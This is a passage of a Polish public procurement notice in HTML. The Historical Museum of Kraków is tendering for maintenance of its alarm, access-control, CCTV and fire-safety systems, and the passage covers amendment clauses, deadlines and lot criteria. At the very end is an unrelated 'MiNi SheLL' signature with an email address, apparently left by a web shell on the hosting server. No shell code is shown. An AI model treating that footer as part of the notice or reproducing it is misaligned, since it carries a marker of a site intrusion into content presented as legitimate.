5)	konieczności wykonania zamówienia dodatkowego, które będzie niezbędne dla prawidłowej realizacji przedmiotu zamówienia, a którego realizacji nie można było przewidzieć na etapie składania oferty, wówczas termin realizacji zamówienia określony w umowie pierwotnej zostanie zmieniony o okres przewidziany na realizację i odbiór zamówienia dodatkowego określonego w umowie o udzielenie zamówienia dodatkowego.
3.	Zmiany umowy nastąpią po uprzednim uzasadnieniu konieczności zmian w w/w przypadkach oraz w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
4.	W przypadku gdy w okresie obowiązywania umowy nastąpi:
1)	zmiana stawki podatku od towarów i usług,
2)	zmiana wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
3)	zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniom zdrowotnym lub wysokości składki na ubezpieczenie społeczne lub zdrowotne 
- i wskazane wyżej zdarzenia będą miały wpływ na koszty wykonania zamówienia przez wykonawcę, Strony dokonają zmiany wysokości wynagrodzenia należnego wykonawcy, stosownie do zasad określonych w ust. 5-8.    
5.	Zmiana wysokości wynagrodzenia należnego Wykonawcy może nastąpić tylko po terminie wejścia w życie zmian, o których mowa w ust. 4.
6.	Zmiana wysokości wynagrodzenia zostanie wprowadzona w drodze aneksu do Umowy zawartego w formie o której mowa w ust. 3.
7.	Zmiana wysokości wynagrodzenia Wykonawcy musi być poprzedzona złożeniem pisemnego wniosku przez Wykonawcę lub Zamawiającego określającego podstawę prawną dokonanie zmiany wynagrodzenia Wykonawcy (wskazanie aktu prawnego i daty wejścia w życie jego przepisów stanowiącego podstawę dokonanie zmiany wynagrodzenia Wykonawcy) oraz podstawę faktyczną dokonania zmiany wysokości wynagrodzenia w tym określającego wpływ zmian, o których mowa w ust. 4  na koszty wykonania zamówienia przez Wykonawcę.
8.	Wykonawca w terminie 7 dni od dnia wystąpienia przez Zamawiającego z takim żądaniem jest zobowiązany do złożenia dowodów potwierdzających ponoszenie kosztów wykonania usługi w określonej wysokości przed dokonaniem zmian o których mowa w ust. 4 i dowodów potwierdzających ponoszenie innych kosztów wykonania usługi po dokonaniu zmian, o których mowa w ust. 4 w szczególności:
1) liczbę osób, dane osób oraz wysokość dotychczasowego wynagrodzenia osób, które wykonywały usługę objętą przedmiotem Umowy i które były wynagrodzone w wysokości minimalnego wynagrodzenia za pracę lub 
2) liczbę osób, dane osób oraz wysokość składek ubezpieczenia społecznego lub zdrowotnego osób które  wykonywały usługę objętą przedmiotem niniejszej umowy,
3) wpływ zmiany stawek podatku od towarów i usług na koszty wykonania usługi.
9.	Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. 
10.	Strony zobowiązane są do powiadomienia siebie wzajemnie na piśmie o przyczynach okolicznościach i zmianach, o których mowa w ust. 2.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mhk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2015 godzina 10:00, miejsce: Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków, Sekretariat Dyrekcji - III p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługi konserwacji i naprawy systemów zabezpieczenia technicznego  w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Część I obejmuje konserwację i naprawę następujących systemów:
a)	System Sygnalizacji Włamania i Napadu SSWiN,
b)	System Kontroli Dostępu	KD,
c)	System Telewizji Dozorowej CCTV	(oprócz Podziemia Rynku - Trasa Turystyczna).
Usługa  ma na celu zapewnienie utrzymania systemów wymienionych powyżej oraz urządzeń wyszczególnionych w Opisie przedmiotu zamówienia w stałej sprawności technicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.32.41.00-3, 50.61.00.00-4, 50.34.30.00-1, 50.34.00.00-0, 50.32.42.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. czas reakcji - 10</li>
<li>3. czas naprawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługi konserwacji i naprawy systemów zabezpieczenia technicznego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> usługi konserwacji i naprawy systemów zabezpieczenia technicznego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa. 
Część II obejmuje System Telewizji Dozorowej CCTV w oddziale Podziemia Rynku - Trasa Turystyczna.
Usługa ma na celu zapewnienie utrzymania systemów wymienionych powyżej oraz urządzeń wyszczególnionych w Opisie przedmiotu zamówienia w stałej sprawności technicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.34.00.00-0, 50.32.41.00-3, 50.32.42.00-4, 50.61.00.00-4, 50.34.30.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas naprawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> usługi konserwacji i naprawy systemów zabezpieczenia technicznego oraz usługi w zakresie monitoringu pożarowego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> usługi konserwacji i naprawy systemów zabezpieczenia technicznego oraz usługi w zakresie monitoringu pożarowego w obiektach i oddziałach Muzeum Historycznego Miasta Krakowa.  
Część III obejmuje:
a)System Sygnalizacji Pożaru	SSP,
b)Dźwiękowy System Ostrzegania	DSO,
c)System Oświetlenia Ewakuacyjnego	SOE,
d)Monitoring Pożarowy 	MP.
Usługa, o której mowa ma na celu zapewnienie utrzymania systemów wymienionych powyżej oraz urządzeń wyszczególnionych w Opisie przedmiotu zamówienia w stałej sprawności technicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.34.00.00-0, 50.32.41.00-3, 50.32.42.00-4, 50.61.00.00-4, 50.34.30.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. czas reakcji - 10</li>
<li>3. czas naprawy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com